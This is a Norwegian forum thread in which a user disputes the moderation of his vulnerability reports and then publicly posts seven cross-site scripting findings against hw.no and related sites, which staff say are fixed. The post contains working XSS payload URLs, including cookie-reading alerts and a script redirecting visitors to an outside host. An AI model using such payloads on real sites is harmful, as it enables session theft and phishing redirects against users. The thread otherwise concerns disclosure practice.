Gå til innhold

Hardware.no: Sikkerhetshull på hw.no

*Tronaldo*

Anbefalte innlegg

*Tronaldo*

*Tronaldo*

Skrevet
  • Forfatter
Skrevet

Posten som ble sensurert bort sa bare at de måtte bestemme seg for om de ville ha det på mail eller om jeg skulle skrive det i denne tråden. Jeg synes det er spennende å finne slike ting og vil selvsagt "vise det frem", men av respekt for hw.no-teamet følger jeg selvsagt oppfordringen fra Ueland. Jeg synes ikke da at det er fair å plukke på "...det er brudd på regelverket å bare skrive "PM sendt". Det har ikke noe for seg for andre"

 

Min mening at antall hull funnet på siden HELT KLART er relevant info for sidens besøkende! Spesielt de som har registrert info om seg selv her!

 

Det kan jo være at det bare er jeg som er sær og ville synes slik info var spennende om jeg leste det på andre fora jeg er medlem på... Men du har rett Goscinny, nå tar det helt av med off-topic prat :)

Lenke til kommentar

Videoannonse

Videoannonse
Annonse
Bolson

Bolson

Skrevet
Skrevet
Min mening at antall hull funnet på siden HELT KLART er relevant info for sidens besøkende! Spesielt de som har registrert info om seg selv her!

 

Det kan jo være at det bare er jeg som er sær og ville synes slik info var spennende om jeg leste det på andre fora jeg er medlem på... Men du har rett Goscinny, nå tar det helt av med off-topic prat :)

 

Helt enig at det er interessant, også når det gjelder vurdering av hw.no sin tekniske kvalitet og sikkerhet.

 

Det er helt greit at vi oppfordres til å sende inn meldinger på epost (minsker også risiko for misbruk), men jeg ville uansett hatt en "etterlogg" med rettede feil.

Lenke til kommentar
*Tronaldo*

*Tronaldo*

Skrevet
  • Forfatter
Skrevet

Da er i alle fall vi på samme linje, Bolson. Det er forøvrig skrekkelig stille fra fredrik som sensurerte posten min. Skremmende at man blir straffet for å hjelpe til og møtte med (det jeg oppfatter som) sure oppstøt. Gjør en løpende vurdering på om jeg heller skal poste videre funn på http://packetstormsecurity.org/ istedet, der blir det man i alle fall møtt med litt "common decency"... Argh...

Lenke til kommentar
Goscinny

Goscinny

Skrevet
Skrevet

Så dere mener at det gir god statistikk om en bruker poster "PM", "Ny PM" og "Enda en PM", mens ti andre gjør som de skal og sender feilen på mail til drift? Bedre om Drift kommer tilbake med en liten rapport om antall feil, osv. Det er iallfall min mening. Men det er klart at dette er interessant. Jeg trodde HW var ganske sikkert, men det er tydeligvis ikke helt tett (uten av jeg veit helt hvor farlig dette er). Jeg vil gjerne få en kommentar fra dem når alt er tettet og fikset opp i :)

 

Goscinny ;)

Lenke til kommentar
Ueland

Ueland

Skrevet
Skrevet

Vi er selvagt ikke interresert i å ha sikkerhetshull på sidene våre. Tronaldo sendte meg 3 tips på hull som ikke var direkte farlige, men som kunne bli misbrukt av rette personer. Disse fikk vi fikset i løpet av noen timer fra vi ble obs på de. Så ja, vi er glad i å få tips om hull når noen oppdages(via rette kanaler) :)

Lenke til kommentar
  • 3 uker senere...
*Tronaldo*

*Tronaldo*

Skrevet
  • Forfatter
Skrevet

Tilbake igjen. Noe nytt? Njet!

 

For å gjøre et poeng ut av det jeg oppfatter som sensur og SVÆRT tvilsom moderering, bestemte jeg meg for å følge spillereglene satt av den ivrige modetatoren og sendte noen flere tips til [email protected]. Brukte en liten time på å finne noen hull og smekket av gårde en mail! Jeg visste jo egentlig utfallet, men som sagt - to prove a point, sendte jeg en mail. Jeg har ikke fått noe respons på noen som helst måte og har ikke engang fått et standardsvar med "vi har registrert din henvendelse..." :)

 

Hullene som jeg skrev i toppen av denne tråden ble fikset på null komma niks, men hva med de jeg sendte på mail kvelden 9 feb i år? INGEN av de har blitt rettet. Dette må bety at de vurderes av HW som mindre viktige, og jeg velger da følgelig å publisere dem her.

 

1. http://www.bruktmarked.no/kat.php?k=0<'">'"<script>alert("XSS!")</script>

2. http://pass.hw.no/registrer.php
=> Passord feltet, sett inn '">'"<script>alert(document.cookie)</script>>

3. http://www.kulturo.no/search.php?stringQuery=>'"<script>alert("XSS")</script>

4. http://www.kulturo.no/search.php?stringQuery=>'">'">'"<script>document.location.replace("http://www.lurerDeg.nå")</script>>'"

5. http://prisguide.kulturo.no/product.php?productId=37071"<script><script>alert(document.cookie)</script>

6. http://prisguide.kulturo.no/product.php?productId=37071&view=userReviews
Sett inn XSS i alle variablene (boksene), de fleste må fikses

7. "Tips om feil"-seksjonens "Oppgi epostadresse hvis du ønsker svar"-feltet

Lenke til kommentar
Karlstad

Karlstad

Skrevet
Skrevet

Hei,

 

Jeg må nesten beklage om du på noen måte føler deg ignorert / dårlig behandlet i denne saken. E-posten din har vi mottatt, og den ligger i vårt køsystem. Beklagelig nok så sender ikke køsystemet ut noen bekreftelse når vi mottar saker.

 

Feilene skal være rettet nå, og om du (eller andre for den saks skyld) finner flere så send gjerne inn disse og. Sikkerhet er selvfølgelig noe vi prioriterer, og vi setter pris på om/når dere melder i fra om feil på sidene til oss slik at vi kan ta tak i det raskest mulig :)

Lenke til kommentar

Opprett en konto eller logg inn for å kommentere

Du må være et medlem for å kunne skrive en kommentar

Opprett konto

Det er enkelt å melde seg inn for å starte en ny konto!

Start en konto

Logg inn

Har du allerede en konto? Logg inn her.

Logg inn nå
Gå til emneliste

  • Hvem er aktive   0 medlemmer

    • Ingen innloggede medlemmer aktive
×
×
  • Opprett ny...